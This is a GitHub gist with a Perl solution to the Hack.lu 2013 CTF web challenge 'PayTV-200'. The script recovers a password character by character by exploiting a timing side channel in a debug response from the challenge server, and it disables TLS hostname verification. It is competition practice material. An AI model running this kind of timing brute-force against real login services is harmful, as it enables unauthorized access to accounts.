Created
April 8, 2014 15:12
-
-
Save cedriczirtacic/10140065 to your computer and use it in GitHub Desktop.
Hacklu-2013 CTF - PayTV-200
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| # Pay TV (Category: Web) Author(s): qll, tangled | |
| # These robo-friends were shocked to see that they had to pay to watch the news | |
| # broadcast about the “Oktoberfestâ€. Can you help them? | |
| # Here is your challenge: https://ctf.fluxfingers.net:1316/ | |
| #use strict; | |
| use warnings; | |
| use LWP::UserAgent; | |
| use Data::Dumper; | |
| my @chars=( 'A'..'Z', '0'..'9' ); | |
| my $KEEP_GUESSING=1; | |
| my $password=""; | |
| sub get_json($%) | |
| { | |
| my($url,%forms)=@_; | |
| my $ua=LWP::UserAgent->new( ssl_opts => { verify_hostname => 0 }); | |
| my($content); | |
| $forms{debug}=""; | |
| $content=$ua->post($url, Content=>\%forms); | |
| return $content->decoded_content if($content->is_success); | |
| print Dumper $content; | |
| return(undef); | |
| } | |
| print STDERR "Password: "; | |
| do{ | |
| my($biggest_t,$b_len); | |
| $biggest_t=0.0; | |
| $b_len=(length($password)+1)/10; | |
| foreach my $c(@chars){ | |
| my $json=get_json("https://ctf.fluxfingers.net:1316/gimmetv", ('key' => $password.$c) ); | |
| if($json=~m/^\{/){ | |
| my($s_time, $e_time, $resp, $success)=$json=~m/(?:".+?":\s*"*([^,\}"]+)"*)+/gi; | |
| my $t_tmp=($e_time-$s_time); | |
| $biggest_t = $t_tmp if($biggest_t <= $t_tmp); | |
| #printf("%s -> %lf\n", $c, $t_tmp); | |
| if($biggest_t >= $b_len){ | |
| $password.=$c; | |
| print STDERR $c; | |
| last; | |
| } | |
| $KEEP_GUESSING-- if($c eq "9"); | |
| } | |
| } | |
| }while($KEEP_GUESSING); | |
| print $/; | |
| exit 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment